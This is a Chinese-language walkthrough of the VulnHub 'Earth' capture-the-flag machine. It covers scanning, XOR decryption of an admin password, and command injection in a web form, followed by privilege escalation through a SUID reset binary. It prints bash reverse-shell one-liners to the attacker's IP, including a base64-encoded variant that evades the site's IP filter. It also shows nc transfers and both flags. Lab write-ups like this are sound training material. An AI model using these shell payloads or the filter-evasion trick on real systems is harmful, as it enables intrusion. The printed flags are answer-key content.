https://www.vulnhub.com/entry/the-planets-earth,755/

MD5 ：7577F9CB54D024FD2283C998BCC8C173    SHA1 ：6476ACC056C32E09377B5403126FB0B34DBEA0A7

user_flag：user_flag_3353b67d6437f07ba7d34afd7d2fc27droot_flag：root_flag_b0da9554d29db2117b02aa8b66ec492e   

nmap -sP 192.168.241.0/24

nmap -sV -v -T4 192.168.241.190   

Windows和Linux的hosts文件地址分别如下：Windows: C:WindowsSystem32driversetchostsLinux: /etc/hosts

https://earth.local/

https://terratest.earth.local/

https://terratest.earth.local/testingnotes.txt

安全消息系统测试记录：使用 XOR 加密算法，鉴于其在 RSA 中的应用，应该是安全的。地球方面已确认收到我们发送的消息。使用 testdata.txt 测试加密。terra 用作管理员门户的用户名。
待办事项：我们如何将每月的密钥安全地发送给地球？或者是否应该每周更换密钥？需要测试不同的密钥长度以防止暴力破解。密钥长度应该设置多长？需要改进消息界面和管理员面板，目前界面非常简单。

import binasciidef xor_encrypt_decrypt(entry_str, pass_txt):    # 将pass_txt转换成16进制    pass_txt_16 = binascii.hexlify(pass_txt.encode('utf-8')).decode('utf-8')    # 对entry_str和pass_txt_16进行xor运算    result = hex(int(entry_str, 16) ^ int(pass_txt_16, 16))[2:]    # 将xor运算结果转换回字符串    try:        datatext = binascii.unhexlify(result).decode('utf-8')    except (binascii.Error, UnicodeDecodeError):        datatext = "Error decoding result"    return datatext# 输入# 16进制格式的加密文本entry_str = '2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a'# 密钥pass_txt = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."# 进行加密或解密操作datatext = xor_encrypt_decrypt(entry_str, pass_txt)print(datatext)

E:Python111venvScriptspython.exe E:/Python111/111.pyearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
进程已结束，退出代码 0

find / -type f -name "*flag*"

bash -i >& /dev/tcp/192.168.241.138/6547 0>&1

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMzgvNDU2NyAwPiYx}|{base64,-d}|{bash,-i}'

find / -name "*.py" -type f |xargs grep "Remote connections are forbidden"

cat /var/earth_web/secure_message/forms.py  

import refrom ipaddress import ip_addressfrom django import formsfrom django.core.exceptions import ValidationErrorfrom .models import EncryptedMessage
class MessageForm(forms.ModelForm):    message_key = forms.CharField(max_length=50)
    class Meta:        model = EncryptedMessage        fields = ['message']
class CLICommandField(forms.CharField):    def validate(self, value):        super().validate(value)        for potential_ip in re.findall(r'd{1,3}.d{1,3}.d{1,3}.d{1,3}', value):            try:                ip_address(potential_ip)            except:                pass            else:                raise ValidationError('Remote connections are forbidden.')
class CLIForm(forms.Form):    cli_command = CLICommandField(label='CLI command', max_length=100)

┌──(root㉿kali)-[~]└─# echo "bash -i >& /dev/tcp/192.168.241.138/9988 0>&1" | base64YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMzgvOTk4OCAwPiYxCg==
提交信息为：echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMzgvOTk4OCAwPiYxCg" |base64 -d |bash

python3 -c "import pty;pty.spawn('/bin/bash')"

find / -perm -u=s -type f 2>/dev/null 

//Kali上执行nc -nlvp 9988 >reset_root//靶机上执行nc 192.168.241.138 9988 </usr/bin/reset_root

┌──(root㉿kali)-[~]└─# chmod +x reset_root     
┌──(root㉿kali)-[~]└─# strace ./reset_rootexecve("./reset_root", ["./reset_root"], 0x7fff23204e80 /* 33 vars */) = 0brk(NULL)                               = 0x972000mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb95ae6f000access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (没有那个文件或目录)openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=75727, ...}, AT_EMPTY_PATH) = 0mmap(NULL, 75727, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fb95ae5c000close(3)                                = 0openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3read(3, "177ELF2113��������3�>�1���P~2�����"..., 832) = 832pread64(3, "6���4���@�������@�������@�������"..., 784, 64) = 784newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1933688, ...}, AT_EMPTY_PATH) = 0pread64(3, "6���4���@�������@�������@�������"..., 784, 64) = 784mmap(NULL, 1985936, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fb95ac77000mmap(0x7fb95ac9d000, 1404928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fb95ac9d000mmap(0x7fb95adf4000, 348160, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17d000) = 0x7fb95adf4000mmap(0x7fb95ae49000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d1000) = 0x7fb95ae49000mmap(0x7fb95ae4f000, 52624, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fb95ae4f000close(3)                                = 0mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb95ac74000arch_prctl(ARCH_SET_FS, 0x7fb95ac74740) = 0set_tid_address(0x7fb95ac74a10)         = 352672set_robust_list(0x7fb95ac74a20, 24)     = 0rseq(0x7fb95ac75060, 0x20, 0, 0x53053053) = 0mprotect(0x7fb95ae49000, 16384, PROT_READ) = 0mprotect(0x403000, 4096, PROT_READ)     = 0mprotect(0x7fb95aea1000, 8192, PROT_READ) = 0prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0munmap(0x7fb95ae5c000, 75727)           = 0newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0getrandom("xb7xb8xbfxddxf0x48xdfx56", 8, GRND_NONBLOCK) = 8brk(NULL)                               = 0x972000brk(0x993000)                           = 0x993000write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...) = 38access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (没有那个文件或目录)access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (没有那个文件或目录)access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (没有那个文件或目录)write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.) = 44exit_group(0)                           = ?+++ exited with 0 +++
┌──(root㉿kali)-[~]└─# 

/dev/shm/kHgTFI5G/dev/shm/Zw7bV9U5/tmp/kcM0Wewe   

touch /dev/shm/kHgTFI5Gtouch /dev/shm/Zw7bV9U5touch /tmp/kcM0Wewe